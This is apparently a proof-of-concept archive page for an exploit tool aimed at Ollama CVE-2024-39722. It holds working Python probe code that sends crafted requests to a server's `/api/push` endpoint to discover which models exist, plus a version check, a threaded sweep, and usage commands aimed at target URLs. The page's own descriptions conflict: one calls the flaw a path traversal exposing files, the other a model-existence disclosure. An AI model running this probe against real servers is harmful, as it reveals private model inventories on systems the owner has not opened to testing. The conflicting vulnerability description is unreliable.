POC details: b77e83608160e0afafd3fa40b745b7cbdeabb1f9

Source
Related vulnerability
Title: Ollama security vulnerability (CVE-2024-39722)
Description: Ollama is an open-source framework for running large language models locally. Ollama versions prior to 0.1.46 contain a security vulnerability: a path traversal flaw in the `api/push` route can expose files on the host server.
Introduction
# Ollama CVE-2024-39722 Exploit Tool

This tool is designed to exploit CVE-2024-39722, a model existence disclosure vulnerability in Ollama versions up to and including 0.1.45. It allows users to check if an Ollama server is vulnerable and attempt to discover existing models on the server. Additionally, it can crawl the official Ollama model library to generate a list of potential models for testing.
[中文](README_zh.md)

## Vulnerability Details

*   **CVE ID:** CVE-2024-39722
*   **Description:** Ollama versions <= 0.1.45 are vulnerable to a model existence disclosure. By sending a specially crafted request to the `/api/push` endpoint, an attacker can determine if a specific model (including custom models not in the public library) exists on the server.
*   **Affected Versions:** <= 0.1.45
*   **CVSS Score:** 7.5 (High)
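
The probe itself can be sketched roughly as follows. This is a minimal illustration, not the bundled `CVE_2024_39722.py`: the exact payload fields and the error string used to distinguish existing from missing models are assumptions about the Ollama `/api/push` behavior, and the real script may check differently.

```python
# Hedged sketch of a single model-existence probe against /api/push.
# Assumption: a missing model yields an error body containing
# "file does not exist", while an existing model fails differently.
import json
import urllib.error
import urllib.request


def build_push_payload(model: str) -> dict:
    """JSON body for the push probe; 'insecure' relaxes registry TLS checks."""
    return {"name": model, "insecure": True, "stream": False}


def model_exists(base_url: str, model: str, timeout: float = 5.0) -> bool:
    """Return True if the server's error text suggests the model exists."""
    req = urllib.request.Request(
        f"{base_url}/api/push",
        data=json.dumps(build_push_payload(model)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError as exc:
        body = exc.read().decode(errors="replace")
    return "file does not exist" not in body


# Example (requires a reachable server):
# model_exists("http://localhost:11434", "llama3:latest")
```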

## Features

*   **Crawl Ollama Model Library:** Fetches the list of models from the official Ollama library (`https://ollama.com/library`).
*   **Version Check:** Checks if the target Ollama server version is vulnerable.
*   **Exploit Vulnerability:** Attempts to discover existing models on a vulnerable Ollama server using a list of known model names.
*   **Multi-threaded Exploitation:** Uses multiple threads for faster model discovery.
*   **Output Results:** Saves crawled models and leaked models to a JSON file.
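
The multi-threaded sweep in the feature list amounts to fanning one probe function out over a candidate list. A minimal sketch, assuming a `probe(model) -> bool` callable such as the `/api/push` check (function names here are illustrative, not taken from the script):

```python
# Hedged sketch of the concurrent model sweep.
from concurrent.futures import ThreadPoolExecutor


def sweep(models, probe, threads: int = 10):
    """Probe each candidate model concurrently; return the names found."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        # Collect inside the 'with' so all futures finish before shutdown.
        results = list(pool.map(probe, models))
    return [name for name, found in zip(models, results) if found]
```

Thread-based concurrency fits here because each probe is a blocking HTTP round-trip, so the GIL is not a bottleneck.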

## Requirements

*   Python 3.x
*   `requests`
*   `lxml`
*   `termcolor`

## Installation

1.  Clone the repository or download the script `CVE_2024_39722.py`.
2.  Install the required Python packages:
    ```bash
    pip install requests lxml termcolor
    ```

## Usage

```bash
python CVE_2024_39722.py [options]
```

### Options

*   `-h, --help`: Show the help message and exit.
*   `-u URL, --url URL`: Target Ollama server URL (e.g., `http://localhost:11434`).
*   `-c, --crawl`: Crawl Ollama models library and save them to `links.json`.
*   `-o OUTPUT, --output OUTPUT`: Output file for results (default: `results.json`).
*   `-t THREADS, --threads THREADS`: Number of threads to use for exploitation (default: 10).
*   `-v, --version-check`: Only check if the target Ollama server is vulnerable based on its version.
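
The `--version-check` logic reduces to comparing the server's reported version against the 0.1.46 fix. A minimal sketch under that assumption (Ollama exposes the version via `GET /api/version` as `{"version": "..."}`; the comparison helpers below are illustrative):

```python
# Hedged sketch: decide vulnerability from a version string.
def parse_version(version: str) -> tuple:
    """Turn '0.1.45' or 'v0.1.45' into a comparable tuple of ints."""
    return tuple(int(part) for part in version.strip().lstrip("v").split("."))


def is_vulnerable(version: str) -> bool:
    """Versions strictly below 0.1.46 are affected by CVE-2024-39722."""
    return parse_version(version) < (0, 1, 46)
```

Tuple comparison avoids the classic string-comparison pitfall where `"0.1.9" > "0.1.46"` lexicographically.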

### Examples

1.  **Show help:**
    ```bash
    python CVE_2024_39722.py -h
    ```

2.  **Crawl Ollama model library:**
    This will fetch model names from `https://ollama.com/library` and save them to `links.json`.
    ```bash
    python CVE_2024_39722.py --crawl
    ```

3.  **Check if a target server is vulnerable:**
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434 --version-check
    ```

4.  **Exploit a target server:**
    This first checks the server's version. If the server is vulnerable, the tool uses `links.json` as the model list (crawling the library first if the file does not exist) to test for model existence.
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434
    ```

5.  **Exploit with a specific number of threads:**
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434 -t 20
    ```

6.  **Exploit and save results to a custom file:**
    ```bash
    python CVE_2024_39722.py -u http://localhost:11434 -o discovered_models.json
    ```

## Disclaimer

This tool is intended for educational and authorized security testing purposes only. Do not use it on any system without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this tool.
File snapshot

```
[4.0K] /data/pocs/b77e83608160e0afafd3fa40b745b7cbdeabb1f9
├── [ 13K] CVE_2024_39722.py
├── [3.3K] README.md
└── [3.1K] README_zh.md

0 directories, 3 files
```